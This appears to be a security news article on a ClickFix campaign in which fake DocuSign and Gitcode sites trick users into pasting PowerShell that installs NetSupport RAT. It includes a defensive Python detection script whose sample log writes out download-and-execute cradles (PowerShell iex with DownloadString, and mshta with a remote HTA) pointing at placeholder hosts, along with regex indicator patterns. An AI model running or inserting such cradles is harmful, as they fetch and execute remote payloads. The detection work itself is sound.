
Phony DocuSign and Gitcode websites are tricking targets into downloading malware; here's vital information to stay protected.

Uncovered Innovation in the ClickFix Concept


Heads Up: Malicious Actors Faking DocuSign, Gitcode Websites

  • Google's attention turned to cunning cybercriminals mimicking DocuSign and Gitcode sites
  • These sneaky sites utilize fake CAPTCHA and various scam mechanisms

Cybersecurity experts have uncovered a sinister scheme by malicious actors running false Gitcode and DocuSign websites, spreading remote access trojan (RAT) malware utilizing an old yet persistent trick, known as ClickFix.

Information from DomainTools Investigations (DTI) reveals the deployment of "malicious multi-stage PowerShell scripts" on spoofed websites, which encourage users to open the Windows Run dialog and paste in a script they have just copied from the page. Uh-oh!

According to the researchers, the PowerShell script then downloads another script, installs it on the system, and executes additional payloads, culminating in the installation of NetSupport RAT on the compromised device. The multiple stages and downloads are used deliberately to dodge detection and make the campaign more resilient against security investigations and takedowns.

Looking deeper: How are victims ensnared?

Although researchers didn't pinpoint the precise methodology employed to direct victims to these websites, social engineering, phishing emails, and potential malvertising are likely involved. Some of the fraudulent sites even come with a phony CAPTCHA verification process, in which the victims copy and paste a code into the Run program, unintentionally downloading the malware.
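The two paragraphs above describe the shape a ClickFix infection leaves on an endpoint: a command pasted into the Run dialog, so the interpreter is spawned by explorer.exe, with a command line built to run hidden and pull a second stage from the web. The following detection snippet is an added example, not code from the DomainTools report or from the article; it triages constructed process-creation events (Sysmon-style JSON lines, all values including the example.invalid URLs made up for illustration) and flags the ones that fit that shape. The indicator list and the two-indicator threshold are assumptions chosen for the example, not a published signature.

```python
"""Triage process-creation events for the ClickFix "paste into Run" pattern.

Added example (not from the article or DomainTools). Assumes Sysmon-style
fields Image, ParentImage, CommandLine, ProcessId serialised as JSON lines.
"""
import json
import re
from typing import Dict, List

# A command typed into the Run dialog is launched by explorer.exe, so the
# interesting events are interpreters whose parent is explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Indicator patterns (assumption: illustrative, not exhaustive). Each one
# matches a command-line feature the multi-stage loader described above needs.
SUSPICIOUS_TOKENS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|net\.webclient)", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "mshta_remote": re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I),
    "url": re.compile(r"https?://", re.I),
}
MIN_INDICATORS = 2  # assumption: tune against your own baseline


def indicators(command_line: str) -> List[str]:
    """Return the names of every indicator pattern present in the command line."""
    return [name for name, rx in SUSPICIOUS_TOKENS.items() if rx.search(command_line)]


def triage(event: Dict[str, object]) -> Dict[str, object]:
    """Score one event; flagged only when it came from the Run dialog AND looks like a loader."""
    image = str(event.get("Image", "")).rsplit("\\", 1)[-1].lower()
    parent = str(event.get("ParentImage", "")).rsplit("\\", 1)[-1].lower()
    hits = indicators(str(event.get("CommandLine", "")))
    from_run_dialog = parent == RUN_DIALOG_PARENT and image in INTERPRETERS
    return {
        "pid": event.get("ProcessId"),
        "image": image,
        "parent": parent,
        "indicators": hits,
        "flagged": from_run_dialog and len(hits) >= MIN_INDICATORS,
    }


def triage_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse JSON lines and triage each one, skipping blank lines."""
    return [triage(json.loads(line)) for line in lines if line.strip()]


# Constructed sample events (paths, PIDs and URLs are invented for the example).
SAMPLE_LOG = [
    # 1: ClickFix-style paste: hidden window, policy bypass, download cradle, iex
    r'''{"ProcessId": 4412, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')\""}''',
    # 2: benign admin use of the Run dialog
    r'''{"ProcessId": 5120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -NoExit -Command Get-ChildItem C:\\Users"}''',
    # 3: same loader shape but parent is cmd.exe, so not a Run-dialog paste (belongs to a different rule)
    r'''{"ProcessId": 6008, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell -w hidden -c iex (iwr https://example.invalid/agent.ps1)"}''',
    # 4: mshta variant launched from the Run dialog with a remote HTA
    r'''{"ProcessId": 7204, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta https://example.invalid/verify.hta"}''',
]

if __name__ == "__main__":
    for result in triage_log(SAMPLE_LOG):
        if result["flagged"]:
            print(f"pid {result['pid']} {result['image']} <- {result['parent']}: {result['indicators']}")
```

Two design choices are worth noting. The parent-process condition is what ties the rule to ClickFix specifically; event 3 carries the same loader features but is not flagged here, because a hidden PowerShell download under cmd.exe is a different (and still suspicious) pattern that deserves its own rule rather than a false match on this one. And because the first stage only needs a couple of these features, the threshold is kept low; the intended follow-up is analyst review of the full command line, not automatic blocking.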

Though DTI couldn't verify the attackers' identities, they noted a similar campaign that surfaced in late 2024 and was linked to SocGholish:

"Notably, the tactics employed are common practice, and NetSupport Manager is a well-known administration tool frequently misused by various threat gangs like FIN7, Scarlet Goldfinch, Storm-0408, and others," the report concluded.

SocGholish: The Original ClickFix Mastermind

SocGholish, also known as FakeUpdates, is no novice in the world of deceitful schemes. Historically, this group has preyed on users by delivering fake browser and software update alerts. After compromising a website, the con artists would inject a popup stating that the user's browser or operating system required "fixing" or "updating."


This cunning tactic, a variant of the original ClickFix scheme, harks back to the old "you have a virus" popups that mimicked popular antivirus programs and delivered viruses themselves.

Via The Tech Hunter Newsroom

Expand your knowledge:

  • A sly new ClickFix malware variant targeting macOS, Android, and iOS using browser-based redirections

Security teams should prepare for campaigns like this one: a ClickFix operation that fakes Gitcode and DocuSign websites, deploys multi-stage PowerShell scripts built to evade detection, and culminates in the installation of NetSupport RAT.

This ClickFix campaign is a clever adaptation of the fake browser and software update alerts long associated with the notorious SocGholish group. For a stronger defense, it is still worth researching the top authenticator apps and the best password managers.
